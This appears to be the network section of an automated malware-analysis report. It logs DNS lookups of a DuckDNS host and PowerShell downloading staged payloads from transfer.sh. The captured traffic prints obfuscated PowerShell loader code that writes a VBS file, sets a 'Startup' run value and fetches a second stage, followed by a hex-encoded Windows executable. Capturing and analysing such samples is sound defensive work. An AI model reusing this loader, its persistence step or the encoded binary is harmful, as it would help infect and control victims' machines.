Sep 14, 2021 17:04:48.967883110 CEST	8.8.8.8	192.168.2.5	0x408d	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 17:04:56.045280933 CEST	8.8.8.8	192.168.2.5	0x7a0b	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 17:05:03.024739027 CEST	8.8.8.8	192.168.2.5	0x546c	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 17:05:10.354581118 CEST	8.8.8.8	192.168.2.5	0x3c00	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 17:05:18.311486006 CEST	8.8.8.8	192.168.2.5	0xef77	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 17:05:25.436649084 CEST	8.8.8.8	192.168.2.5	0xc768	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 17:05:32.478907108 CEST	8.8.8.8	192.168.2.5	0x5d4a	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 17:05:38.954695940 CEST	8.8.8.8	192.168.2.5	0x4fae	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 17:05:46.116606951 CEST	8.8.8.8	192.168.2.5	0x15fa	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 17:05:53.091439009 CEST	8.8.8.8	192.168.2.5	0xb611	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 17:06:00.274141073 CEST	8.8.8.8	192.168.2.5	0x41cd	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 17:06:07.287725925 CEST	8.8.8.8	192.168.2.5	0xe393	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

transfer.sh

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49734	144.76.136.153	443	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-14 15:02:15 UTC	0	OUT	GET /yxvc69/edrftg.txt HTTP/1.1 Host: transfer.sh Connection: Keep-Alive
2021-09-14 15:02:16 UTC	0	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename="edrftg.txt" Content-Length: 10841 Content-Type: text/plain; charset=utf-8 Retry-After: Tue, 14 Sep 2021 17:02:17 GMT Server: Transfer.sh HTTP Server 1.0 X-Made-With: <3 by DutchCoders X-Ratelimit-Key: 84.17.52.51 X-Ratelimit-Limit: 10 X-Ratelimit-Rate: 600 X-Ratelimit-Remaining: 9 X-Ratelimit-Reset: 1631631737 X-Remaining-Days: n/a X-Remaining-Downloads: n/a X-Served-By: Proudly served by DutchCoders Date: Tue, 14 Sep 2021 15:02:16 GMT Connection: close
2021-09-14 15:02:16 UTC	0	IN	Data Raw: 24 61 61 20 3d 20 22 32 34 3a 2d 3a 34 36 3a 2d 3a 35 36 3a 2d 3a 35 39 3a 2d 3a 35 34 3a 2d 3a 34 36 3a 2d 3a 35 39 3a 2d 3a 35 34 3a 2d 3a 34 36 3a 2d 3a 35 39 3a 2d 3a 34 36 3a 2d 3a 35 39 3a 2d 3a 34 36 3a 2d 3a 35 39 3a 2d 3a 34 36 3a 2d 3a 35 39 3a 2d 3a 34 36 3a 2d 3a 34 37 3a 2d 3a 35 39 3a 2d 3a 33 64 3a 2d 3a 32 32 3a 2d 3a 34 33 3a 2d 3a 33 61 3a 2d 3a 35 63 3a 2d 3a 35 35 3a 2d 3a 37 33 3a 2d 3a 35 34 3a 2d 3a 35 32 3a 2d 3a 35 39 3a 2d 3a 34 33 3a 2d 3a 35 34 3a 2d 3a 35 35 3a 2d 3a 35 36 3a 2d 3a 35 39 3a 2d 3a 34 39 3a 2d 3a 34 32 3a 2d 3a 35 35 3a 2d 3a 34 33 3a 2d 3a 35 32 3a 2d 3a 35 39 3a 2d 3a 34 33 3a 2d 3a 35 34 3a 2d 3a 35 35 3a 2d 3a 35 36 3a 2d 3a 35 39 3a 2d 3a 34 39 3a 2d 3a 34 32 3a 2d 3a 35 34 3a 2d 3a 34 33 3a 2d 3a 35 32 3a Data Ascii: $aa = "24:-:46:-:56:-:59:-:54:-:46:-:59:-:54:-:46:-:59:-:46:-:59:-:46:-:59:-:46:-:59:-:46:-:47:-:59:-:3d:-:22:-:43:-:3a:-:5c:-:55:-:73:-:54:-:52:-:59:-:43:-:54:-:55:-:56:-:59:-:49:-:42:-:55:-:43:-:52:-:59:-:43:-:54:-:55:-:56:-:59:-:49:-:42:-:54:-:43:-:52:
2021-09-14 15:02:16 UTC	1	IN	Data Raw: 2d 3a 34 37 3a 2d 3a 35 39 3a 2d 3a 34 37 3a 2d 3a 35 35 3a 2d 3a 35 39 3a 2d 3a 34 37 3a 2d 3a 35 39 3a 2d 3a 35 35 3a 2d 3a 34 37 3a 2d 3a 32 30 3a 2d 3a 33 64 3a 2d 3a 32 30 3a 2d 3a 32 32 3a 2d 3a 34 33 3a 2d 3a 37 32 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 36 66 3a 2d 3a 37 32 3a 2d 3a 37 39 3a 2d 3a 32 32 3a 2d 3a 32 65 3a 2d 3a 35 32 3a 2d 3a 36 35 3a 2d 3a 37 30 3a 2d 3a 36 63 3a 2d 3a 36 31 3a 2d 3a 36 33 3a 2d 3a 36 35 3a 2d 3a 32 38 3a 2d 3a 32 32 3a Data Ascii: -:47:-:59:-:47:-:55:-:59:-:47:-:59:-:55:-:47:-:20:-:3d:-:20:-:22:-:43:-:72:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:6f:-:72:-:79:-:22:-:2e:-:52:-:65:-:70:-:6c:-:61:-:63:-:65:-:28:-:22:
2021-09-14 15:02:16 UTC	3	IN	Data Raw: 34 32 3a 2d 3a 34 36 3a 2d 3a 35 39 3a 2d 3a 34 38 3a 2d 3a 34 37 3a 2d 3a 35 34 3a 2d 3a 34 36 3a 2d 3a 35 39 3a 2d 3a 34 38 3a 2d 3a 34 36 3a 2d 3a 34 38 3a 2d 3a 35 35 3a 2d 3a 35 39 3a 2d 3a 34 37 3a 2d 3a 35 39 3a 2d 3a 35 35 3a 2d 3a 33 38 3a 2d 3a 35 39 3a 2d 3a 35 35 3a 2d 3a 35 39 3a 2d 3a 35 39 3a 2d 3a 35 35 3a 2d 3a 35 39 3a 2d 3a 34 37 3a 2d 3a 32 30 3a 2d 3a 33 64 3a 2d 3a 32 32 3a 2d 3a 34 33 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 36 32 3a 2d 3a 36 63 3a 2d 3a 36 39 3a 2d 3a 36 33 3a 2d 3a 35 63 3a 2d 3a 35 32 3a 2d 3a 37 35 3a 2d 3a 36 65 3a 2d 3a 32 32 3a 2d 3a 32 65 3a 2d 3a 35 32 3a 2d 3a Data Ascii: 42:-:46:-:59:-:48:-:47:-:54:-:46:-:59:-:48:-:46:-:48:-:55:-:59:-:47:-:59:-:55:-:38:-:59:-:55:-:59:-:59:-:55:-:59:-:47:-:20:-:3d:-:22:-:43:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:62:-:6c:-:69:-:63:-:5c:-:52:-:75:-:6e:-:22:-:2e:-:52:-:
2021-09-14 15:02:16 UTC	4	IN	Data Raw: 2d 3a 37 34 3a 2d 3a 36 38 3a 2d 3a 32 30 3a 2d 3a 32 34 3a 2d 3a 34 38 3a 2d 3a 34 39 3a 2d 3a 35 35 3a 2d 3a 34 38 3a 2d 3a 34 39 3a 2d 3a 35 35 3a 2d 3a 34 38 3a 2d 3a 34 61 3a 2d 3a 34 39 3a 2d 3a 35 35 3a 2d 3a 34 38 3a 2d 3a 35 35 3a 2d 3a 35 39 3a 2d 3a 35 35 3a 2d 3a 35 35 3a 2d 3a 34 39 3a 2d 3a 34 38 3a 2d 3a 35 39 3a 2d 3a 34 39 3a 2d 3a 35 35 3a 2d 3a 34 39 3a 2d 3a 35 35 3a 2d 3a 34 38 3a 2d 3a 34 39 3a 2d 3a 32 30 3a 2d 3a 32 64 3a 2d 3a 34 65 3a 2d 3a 36 31 3a 2d 3a 36 64 3a 2d 3a 36 35 3a 2d 3a 32 30 3a 2d 3a 32 32 3a 2d 3a 35 33 3a 2d 3a 37 34 3a 2d 3a 36 31 3a 2d 3a 37 32 3a 2d 3a 37 34 3a 2d 3a 37 35 3a 2d 3a 37 30 3a 2d 3a 32 32 3a 2d 3a 32 30 3a 2d 3a 32 64 3a 2d 3a 35 36 3a 2d 3a 36 31 3a 2d 3a 36 63 3a 2d 3a 37 35 3a 2d 3a 36 35 3a Data Ascii: -:74:-:68:-:20:-:24:-:48:-:49:-:55:-:48:-:49:-:55:-:48:-:4a:-:49:-:55:-:48:-:55:-:59:-:55:-:55:-:49:-:48:-:59:-:49:-:55:-:49:-:55:-:48:-:49:-:20:-:2d:-:4e:-:61:-:6d:-:65:-:20:-:22:-:53:-:74:-:61:-:72:-:74:-:75:-:70:-:22:-:20:-:2d:-:56:-:61:-:6c:-:75:-:65:
2021-09-14 15:02:16 UTC	8	IN	Data Raw: 53 65 74 20 48 20 3d 20 4e 6f 74 68 69 6e 67 0d 0a 27 40 0d 0a 53 65 74 2d 43 6f 6e 74 65 6e 74 20 2d 50 61 74 68 20 43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 52 75 6e 5c 4e 65 77 2e 76 62 73 20 2d 56 61 6c 75 65 20 24 43 6f 6e 74 65 6e 74 0d 0a 0d 0a 73 74 61 72 74 2d 73 6c 65 65 70 20 2d 73 20 37 0d 0a 0d 0a 24 53 5a 58 44 43 46 56 47 42 48 4e 4a 53 44 46 47 48 20 3d 20 27 68 74 74 70 73 3a 2f 2f 74 72 61 6e 73 66 65 72 48 2d 48 73 68 2f 6c 6b 75 46 71 63 2f 79 68 75 6a 65 72 48 2d 48 74 78 74 27 2e 52 65 70 6c 61 63 65 28 27 48 2d 48 27 2c 27 2e 27 29 3b 0d 0a 24 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 20 3d 20 22 32 34 3a 2d 3a 34 35 3a 2d 3a 34 34 3a 2d 3a 35 32 3a 2d 3a 34 36 3a 2d 3a 34 37 3a 2d 3a 34 38 3a 2d 3a 34 65 3a 2d 3a Data Ascii: Set H = Nothing'@Set-Content -Path C:\Users\Public\Run\New.vbs -Value $Contentstart-sleep -s 7$SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/lkuFqc/yhujerH-Htxt'.Replace('H-H','.');$HHHHHHHHHHHHHHHHHH = "24:-:45:-:44:-:52:-:46:-:47:-:48:-:4e:-:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49755	144.76.136.153	443	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-14 15:02:49 UTC	11	OUT	GET /lkuFqc/yhujer.txt HTTP/1.1 Host: transfer.sh
2021-09-14 15:02:50 UTC	11	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename="yhujer.txt" Content-Length: 512724 Content-Type: text/plain; charset=utf-8 Retry-After: Tue, 14 Sep 2021 17:02:53 GMT Server: Transfer.sh HTTP Server 1.0 X-Made-With: <3 by DutchCoders X-Ratelimit-Key: 84.17.52.51 X-Ratelimit-Limit: 10 X-Ratelimit-Rate: 600 X-Ratelimit-Remaining: 9 X-Ratelimit-Reset: 1631631773 X-Remaining-Days: n/a X-Remaining-Downloads: n/a X-Served-By: Proudly served by DutchCoders Date: Tue, 14 Sep 2021 15:02:50 GMT Connection: close
2021-09-14 15:02:50 UTC	11	IN	Data Raw: 5b 53 74 72 69 6e 67 5d 24 48 48 3d 27 34 44 35 41 39 2d 2d 2d 2d 33 2d 2d 2d 2d 2d 2d 2d 34 2d 2d 2d 2d 2d 2d 46 46 46 46 2d 2d 2d 2d 42 38 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 2d 2d 2d 2d 2d 2d 2d 2d 45 31 46 42 41 2d 45 2d 2d 42 34 2d 39 43 44 32 31 42 38 2d 31 34 43 43 44 32 31 35 34 36 38 36 39 37 33 32 2d 37 2d 37 32 36 46 36 37 37 32 36 31 36 44 32 2d 36 33 36 31 36 45 36 45 36 46 37 34 32 2d 36 32 36 35 32 2d 37 32 37 35 36 45 32 2d 36 39 36 45 32 2d 34 34 34 46 35 33 32 2d 36 44 36 46 36 34 36 35 32 45 2d 44 2d 44 2d 41 32 34 Data Ascii: [String]$HH='4D5A9----3-------4------FFFF----B8--------------4-----------------------------------------------------------------------8--------E1FBA-E--B4-9CD21B8-14CCD21546869732-7-726F6772616D2-63616E6E6F742-62652-72756E2-696E2-444F532-6D6F64652E-D-D-A24
2021-09-14 15:02:50 UTC	12	IN	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 2d 2d 2d 2d 2d 2d 38 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 32 2d 2d 2d 2d 2d 34 38 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 45 37 34 36 35 37 38 37 34 2d 2d 2d 2d 2d 2d 39 38 43 37 2d 31 2d 2d 2d 2d 32 2d 2d 2d 2d 2d 2d 2d 43 38 2d 31 2d 2d 2d 2d 2d 32 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 2d 2d 2d 2d 2d 36 2d 32 45 37 32 36 35 36 43 36 46 36 33 2d 2d 2d 2d 2d 43 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 2d 2d 2d 2d 2d 32 2d 2d 2d 2d 2d 2d 43 41 2d 31 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d Data Ascii: ------------------------------------------------------2------8-----------------------82-----48----------------------2E74657874------98C7-1----2-------C8-1-----2----------------------------2-----6-2E72656C6F63-----C-----------2-----2------CA-1-------------
2021-09-14 15:02:50 UTC	14	IN	Data Raw: 2d 32 31 45 31 45 32 44 31 32 32 36 2d 33 31 42 31 36 32 43 2d 46 32 36 32 38 35 32 2d 2d 2d 2d 2d 41 32 38 35 33 2d 2d 2d 2d 2d 41 32 41 32 36 32 42 45 43 32 36 32 42 45 46 2d 2d 2d 2d 2d 2d 31 33 33 2d 2d 33 2d 2d 2d 46 2d 2d 2d 2d 2d 2d 2d 43 2d 2d 2d 2d 31 31 2d 32 31 38 31 37 32 44 2d 37 32 36 32 38 35 34 2d 2d 2d 2d 2d 41 32 41 32 36 32 42 46 37 2d 2d 31 33 33 2d 2d 31 2d 2d 2d 42 2d 2d 2d 2d 2d 2d 2d 44 2d 2d 2d 2d 31 31 44 2d 2d 35 2d 2d 2d 2d 2d 32 32 38 34 36 2d 2d 2d 2d 2d 41 32 41 2d 2d 31 33 33 2d 2d 33 2d 2d 2d 46 2d 2d 2d 2d 2d 2d 2d 45 2d 2d 2d 2d 31 31 2d 32 31 42 31 39 32 44 2d 37 32 36 32 38 35 35 2d 2d 2d 2d 2d 41 32 41 32 36 32 42 46 37 2d 2d 2d 33 33 2d 2d 41 2d 2d 2d 46 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 41 31 37 32 Data Ascii: -21E1E2D1226-31B162C-F262852-----A2853-----A2A262BEC262BEF------133--3---F-------C----11-218172D-7262854-----A2A262BF7--133--1---B-------D----11D--5-----22846-----A2A--133--3---F-------E----11-21B192D-7262855-----A2A262BF7---33--A---F---------------21A172
2021-09-14 15:02:51 UTC	15	IN	Data Raw: 2d 2d 2d 2d 2d 2d 2d 41 2d 2d 2d 2d 31 31 2d 32 31 43 31 42 32 44 2d 41 32 36 38 43 2d 38 2d 2d 2d 2d 31 42 32 44 2d 42 32 42 2d 33 32 36 32 42 46 34 32 38 2d 34 2d 2d 2d 2d 32 42 32 41 2d 32 31 36 31 35 32 44 2d 32 32 36 32 41 32 36 32 42 46 43 2d 2d 2d 2d 31 33 33 2d 2d 34 2d 2d 32 2d 2d 2d 2d 2d 2d 2d 2d 41 2d 2d 2d 2d 31 31 2d 33 31 44 31 44 32 44 31 35 32 36 31 32 2d 2d 46 45 31 35 2d 38 2d 2d 2d 2d 31 42 2d 36 31 41 31 36 32 43 2d 41 32 36 38 31 2d 38 2d 2d 2d 2d 31 42 32 41 32 36 32 42 45 39 32 36 32 42 46 34 31 33 33 2d 2d 31 2d 2d 35 35 2d 2d 2d 2d 2d 2d 2d 46 2d 2d 2d 2d 31 31 2d 46 2d 2d 37 42 38 33 2d 2d 2d 2d 2d 34 34 35 2d 34 2d 2d 2d 2d 2d 2d 2d 32 2d 2d 2d 2d 2d 2d 31 2d 2d 2d 2d 2d 2d 2d 31 45 2d 2d 2d 2d 2d 2d 32 43 2d 2d 2d 2d 2d 2d 32 Data Ascii: -------A----11-21C1B2D-A268C-8----1B2D-B2B-3262BF428-4----2B2A-216152D-2262A262BFC----133--4--2--------A----11-31D1D2D152612--FE15-8----1B-61A162C-A2681-8----1B2A262BE9262BF4133--1--55-------F----11-F--7B83-----445-4-------2------1-------1E------2C------2
2021-09-14 15:02:51 UTC	19	IN	Data Raw: 2d 34 2d 33 31 37 31 35 32 44 2d 42 32 36 2d 34 36 46 36 42 2d 2d 2d 2d 2d 41 32 41 32 36 32 42 45 42 32 36 32 42 46 33 2d 2d 2d 2d 2d 2d 2d 33 33 2d 2d 41 2d 2d 33 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 43 31 45 32 44 2d 41 32 36 37 42 31 39 2d 2d 2d 2d 2d 34 32 44 2d 36 32 42 2d 33 32 36 32 42 46 34 32 41 2d 32 31 41 31 35 32 44 31 32 32 36 37 42 31 39 2d 2d 2d 2d 2d 34 2d 33 31 36 31 38 32 44 2d 41 32 36 36 46 36 43 2d 2d 2d 2d 2d 41 32 41 32 36 32 42 45 43 32 36 32 42 46 34 2d 33 33 2d 2d 41 2d 2d 33 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 37 31 45 32 44 2d 41 32 36 37 42 31 39 2d 2d 2d 2d 2d 34 32 44 2d 36 32 42 2d 33 32 36 32 42 46 34 32 41 2d 32 31 36 31 35 32 44 31 32 32 36 37 42 31 39 2d 2d 2d 2d 2d 34 2d 33 31 43 31 Data Ascii: -4-317152D-B26-46F6B-----A2A262BEB262BF3-------33--A--3----------------21C1E2D-A267B19-----42D-62B-3262BF42A-21A152D12267B19-----4-316182D-A266F6C-----A2A262BEC262BF4-33--A--3----------------2171E2D-A267B19-----42D-62B-3262BF42A-216152D12267B19-----4-31C1
2021-09-14 15:02:51 UTC	25	IN	Data Raw: 2d 2d 2d 2d 2d 41 38 2d 33 32 2d 2d 2d 2d 2d 34 32 38 41 36 2d 2d 2d 2d 2d 41 32 38 41 37 2d 2d 2d 2d 2d 41 32 38 36 42 2d 2d 2d 2d 2d 36 32 44 31 43 32 42 31 35 38 2d 34 41 2d 2d 2d 2d 2d 34 32 42 43 41 38 2d 32 41 2d 2d 2d 2d 2d 34 32 42 43 43 38 2d 32 43 2d 2d 2d 2d 2d 34 32 42 43 45 32 38 36 46 2d 2d 2d 2d 2d 36 32 38 37 32 2d 2d 2d 2d 2d 36 32 38 37 33 2d 2d 2d 2d 2d 36 32 38 37 34 2d 2d 2d 2d 2d 36 32 38 36 2d 2d 2d 2d 2d 2d 36 32 38 36 39 2d 2d 2d 2d 2d 36 32 38 36 41 2d 2d 2d 2d 2d 36 32 38 36 31 2d 2d 2d 2d 2d 36 32 38 37 37 2d 2d 2d 2d 2d 36 32 38 37 41 2d 2d 2d 2d 2d 36 32 38 37 35 2d 2d 2d 2d 2d 36 32 38 37 36 2d 2d 2d 2d 2d 36 32 38 37 38 2d 2d 2d 2d 2d 36 32 38 37 39 2d 2d 2d 2d 2d 36 32 38 37 42 2d 2d 2d 2d 2d 36 32 38 37 43 2d 2d 2d 2d 2d Data Ascii: -----A8-32-----428A6-----A28A7-----A286B-----62D1C2B158-4A-----42BCA8-2A-----42BCC8-2C-----42BCE286F-----62872-----62873-----62874-----6286------62869-----6286A-----62861-----62877-----6287A-----62875-----62876-----62878-----62879-----6287B-----6287C-----
2021-09-14 15:02:51 UTC	26	IN	Data Raw: 2d 2d 2d 2d 36 32 42 2d 33 2d 41 32 42 44 34 31 32 2d 31 32 38 39 38 2d 2d 2d 2d 2d 41 32 44 43 2d 44 45 2d 45 31 32 2d 31 46 45 31 36 31 32 2d 2d 2d 2d 31 42 36 46 36 33 2d 2d 2d 2d 2d 41 44 43 32 41 2d 41 2d 31 31 2d 2d 2d 2d 2d 2d 32 2d 2d 2d 46 2d 2d 35 35 36 34 2d 2d 2d 45 2d 2d 2d 2d 2d 2d 2d 2d 31 42 33 2d 2d 33 2d 2d 32 41 2d 31 2d 2d 2d 2d 32 38 2d 2d 2d 2d 31 31 37 45 37 44 2d 2d 2d 2d 2d 34 32 2d 36 32 32 2d 44 2d 31 45 32 38 46 46 2d 2d 2d 2d 2d 36 32 38 41 38 2d 2d 2d 2d 2d 41 31 44 32 44 2d 42 32 36 2d 36 32 38 41 45 2d 2d 2d 2d 2d 41 32 44 2d 36 32 42 2d 33 2d 41 32 42 46 33 32 41 2d 36 32 38 41 46 2d 2d 2d 2d 2d 41 31 37 32 44 31 33 32 36 2d 37 32 38 32 42 2d 31 2d 2d 2d 36 31 38 32 44 2d 43 32 36 2d 38 31 33 2d 39 31 36 31 33 2d 38 32 42 Data Ascii: ----62B-3-A2BD412-12898-----A2DC-DE-E12-1FE1612----1B6F63-----ADC2A-A-11------2---F--5564---E--------1B3--3--2A-1----28----117E7D-----42-622-D-1E28FF-----628A8-----A1D2D-B26-628AE-----A2D-62B-3-A2BF32A-628AF-----A172D1326-7282B-1---6182D-C26-813-91613-82B
2021-09-14 15:02:51 UTC	33	IN	Data Raw: 2d 2d 2d 2d 2d 2d 33 33 2d 2d 39 2d 2d 31 35 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 38 33 43 2d 31 2d 2d 2d 36 32 44 2d 31 32 41 32 38 35 37 2d 31 2d 2d 2d 36 31 38 32 44 2d 32 32 36 32 41 32 36 32 42 46 43 2d 2d 2d 2d 2d 2d 33 45 32 38 33 44 2d 31 2d 2d 2d 36 32 44 2d 31 32 41 31 37 32 38 38 36 2d 2d 2d 2d 2d 36 32 41 31 33 33 2d 2d 34 2d 2d 32 46 2d 31 2d 2d 2d 2d 33 37 2d 2d 2d 2d 31 31 32 38 33 39 2d 31 2d 2d 2d 36 33 39 32 34 2d 31 2d 2d 2d 2d 37 45 37 43 2d 2d 2d 2d 2d 34 32 44 2d 31 32 41 37 45 37 42 2d 2d 2d 2d 2d 34 32 44 2d 37 37 45 33 31 2d 2d 2d 2d 2d 34 32 42 2d 35 37 45 33 2d 2d 2d 2d 2d 2d 34 31 41 32 44 2d 44 32 36 37 45 37 42 2d 2d 2d 2d 2d 34 33 39 41 42 2d 2d 2d 2d 2d 2d 32 42 2d 33 2d 41 32 42 46 31 32 38 33 41 2d 31 2d 2d 2d 36 Data Ascii: ------33--9--15--------------283C-1---62D-12A2857-1---6182D-2262A262BFC------3E283D-1---62D-12A172886-----62A133--4--2F-1----37----112839-1---63924-1----7E7C-----42D-12A7E7B-----42D-77E31-----42B-57E3------41A2D-D267E7B-----439AB------2B-3-A2BF1283A-1---6
2021-09-14 15:02:51 UTC	40	IN	Data Raw: 46 31 39 2d 31 2d 2d 2d 41 31 37 32 44 32 43 32 36 37 45 37 45 2d 2d 2d 2d 2d 34 2d 37 32 2d 39 31 32 36 44 2d 31 45 32 38 46 46 2d 2d 2d 2d 2d 36 32 38 45 39 2d 2d 2d 2d 2d 41 32 38 41 38 2d 2d 2d 2d 2d 41 31 38 32 44 31 31 32 36 2d 36 32 38 41 45 2d 2d 2d 2d 2d 41 32 43 2d 44 32 42 2d 39 2d 43 32 42 41 44 2d 42 32 42 44 32 2d 41 32 42 45 44 44 45 33 2d 37 45 37 45 2d 2d 2d 2d 2d 34 32 38 46 35 2d 2d 2d 2d 2d 41 32 36 2d 36 31 37 38 44 37 32 2d 2d 2d 2d 2d 31 2d 44 2d 39 31 36 2d 38 41 32 2d 39 32 38 32 41 2d 31 2d 2d 2d 36 32 38 42 38 2d 2d 2d 2d 2d 41 44 45 2d 43 32 38 34 43 2d 2d 2d 2d 2d 41 32 38 36 31 2d 2d 2d 2d 2d 41 44 45 2d 2d 32 41 2d 33 2d 43 2d 31 31 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 39 38 39 2d 2d 2d 43 34 36 2d 2d 2d 2d 2d 31 31 33 Data Ascii: F19-1---A172D2C267E7E-----4-72-9126D-1E28FF-----628E9-----A28A8-----A182D1126-628AE-----A2C-D2B-9-C2BAD-B2BD2-A2BEDDE3-7E7E-----428F5-----A26-6178D72-----1-D-916-8A2-9282A-1---628B8-----ADE-C284C-----A2861-----ADE--2A-3-C-11-------------8989---C46-----113
2021-09-14 15:02:51 UTC	47	IN	Data Raw: 33 2d 31 2d 2d 2d 41 38 2d 33 45 2d 2d 2d 2d 2d 34 32 41 2d 2d 31 33 33 2d 2d 36 2d 2d 31 41 2d 2d 2d 2d 2d 2d 35 36 2d 2d 2d 2d 31 31 2d 33 2d 34 2d 35 2d 37 2d 45 2d 34 32 38 32 43 2d 31 2d 2d 2d 36 31 35 32 44 2d 39 32 36 2d 32 2d 36 36 46 41 31 2d 31 2d 2d 2d 36 32 41 2d 41 32 42 46 35 2d 2d 2d 2d 31 33 33 2d 2d 36 2d 2d 31 42 2d 2d 2d 2d 2d 2d 35 37 2d 2d 2d 2d 31 31 2d 33 2d 34 2d 35 2d 45 2d 34 2d 45 2d 35 32 38 32 43 2d 31 2d 2d 2d 36 31 39 32 44 2d 39 32 36 2d 32 2d 36 36 46 41 31 2d 31 2d 2d 2d 36 32 41 2d 41 32 42 46 35 2d 2d 31 33 33 2d 2d 36 2d 2d 33 37 2d 2d 2d 2d 2d 2d 31 37 2d 2d 2d 2d 31 31 31 34 31 37 32 44 31 2d 32 36 37 45 33 39 2d 2d 2d 2d 2d 34 2d 32 36 46 37 32 2d 2d 2d 2d 2d 41 32 43 32 34 32 42 2d 33 2d 41 32 42 45 45 37 45 33 39 Data Ascii: 3-1---A8-3E-----42A--133--6--1A------56----11-3-4-5-7-E-4282C-1---6152D-926-2-66FA1-1---62A-A2BF5----133--6--1B------57----11-3-4-5-E-4-E-5282C-1---6192D-926-2-66FA1-1---62A-A2BF5--133--6--37------17----1114172D1-267E39-----4-26F72-----A2C242B-3-A2BEE7E39
